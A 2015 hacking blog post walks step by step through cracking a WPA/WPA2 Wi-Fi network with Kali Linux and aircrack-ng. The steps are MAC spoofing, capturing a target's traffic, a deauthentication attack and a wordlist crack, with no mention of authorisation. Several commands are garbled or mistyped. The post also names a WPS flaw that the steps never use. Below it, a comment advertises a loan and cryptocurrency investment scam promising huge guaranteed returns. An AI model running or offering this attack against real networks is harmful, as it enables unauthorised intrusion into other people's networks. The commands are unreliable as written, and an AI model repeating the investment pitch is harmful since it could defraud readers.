Sunday, November 29, 2015

LATEST WIFI HACKING WPA/WPA2


Hello Friends, I got many response on to Wi-Fi Hacking, I already discussed about WEP. But Now-a-days many people are using WPA/WPA2 Security Protocol. Wi-Fi Protected Access (WPA/WPA2) are mainly developed in response to serious weaknesses and loopholes in the previous system (WEP).

WPA/WPA2 also have a flaw in its feature add to Wi-Fi called Wi-Fi Protected Setup (WPS) which allows WPA/WPA2 security can be bypassed and cracked in many situation. Many Access Point they have a WPS.

Here, we are going to use Kali Linux, which the pre build OS for HACKERS. It have the all required tools. Firstly, Backtrack is used, now-a-days it is not published. So, here i used Kali Linux. Go To its Homepage and Download Latest Version.

REQUIRED:
Little Knowledge in Kali-Linux, and on commands of Aircrack-ng, If it is the First time that you are learning Wi-Fi hacking, then i recommend you to have a Look on this WEP HACKING By which you will understand the commands, and you can understand more Faster.

So, Let's Begin the Hacking:
1} Open New Terminal, and bring up a list of wireless network interfaces.
 aircrak-ng  
2} Under the interface column, select one of your interfaces. In this case, we will usewlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

3} Next, we need to stop the wlan0 interface and take it down.
 airmon-ng stop wlan0  
 ifconfig wlan0 down  
4} Next, we need to change the MAC address of our interface. In this case, we will use 10:20:30:40:50:60
 macchanger -–mac 10:20:30:40:50:60 wlan0  
5} Now we need to restart airmon-ng
 airmon-ng start wlan0  
6} Next, we will use airodump to locate the available wireless networks nearby.
 airodump-ng wlan0  
7} A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in theBSSID column, right-click, and select copy. 

Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.

8} Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:

–c allows us to select our channel. In this case, we use 10.
–w allows us to select the name of our file. In this case, we have chosen wirelessattack.
–bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78from the clipboard.
 airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0  
9} A new terminal window will open displaying the output from the previous command. Leave this window open.

10} Open another terminal window; to attempt to make an association, we will runaireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments.
 Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 10:20:30:40:50:60 wlan0  
11} Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap.
 Aircrack-ng –w ./wordlist.lst wirelessattack.cap  

That's It: We make It if your Wordlist has the correct keyword then it will shown on the Terminal. Time Depends on your PC speed, also on Number of Password in text file.

1 comment:

  1. Welcome to the future! Financing made easy with Prof. Mrs. DOROTHY JEAN INVESTMENTS

    Hello, Have you been looking for financing options for your new business plans, Are you seeking for a loan to expand your existing business, Do you find yourself in a bit of trouble with unpaid bills and you don’t know which way to go or where to turn to? Have you been turned down by your banks? MRS. DOROTHY JEAN INVESTMENTS says YES when your banks say NO. Contact us as we offer financial services at a low and affordable interest rate of 2% for long and short term loans. Interested applicants should contact us for further loan acquisition procedures via profdorothyinvestments@gmail.com

    We invest in all profitable projects with cryptocurrencies. I'm here to share an amazing life changing opportunity with you. its called Bitcoin / Forex trading options, Are you interested in earning a consistent income through binary/forex trade? or crypto currency trading. An investment of $100 or $200 can get you a return of $2,840 in 7 days of trading and you get to do this from the comfort of your home/work. It goes on and on The higher the investment, the higher the profits. Your investment is safe and secured and payouts assured 100%. if you wish to know more about investing in Cryptocurrency and earn daily, weekly OR Monthly in trading on bitcoin or any cryptocurrency and want a successful trade without losing Contact MRS.DOROTHY JEAN INVESTMENTS Email profdorothyinvestments@gmail.com


    YOURS IN SERVICE
    Mrs. Dorothy Pilkenton Jean
    Financial Advisor on Bank Instruments,
    Private Banking and Client Services
    Email Address: profdorothyinvestments@gmail.com
    Operation: We provide Financial Service Such As Bank Instrument
    From AA Rate Banks, Cash Loan,BG,SBLC,BOND,PPP,MTN,TRADING,FUNDING MONETIZING etc.

    ReplyDelete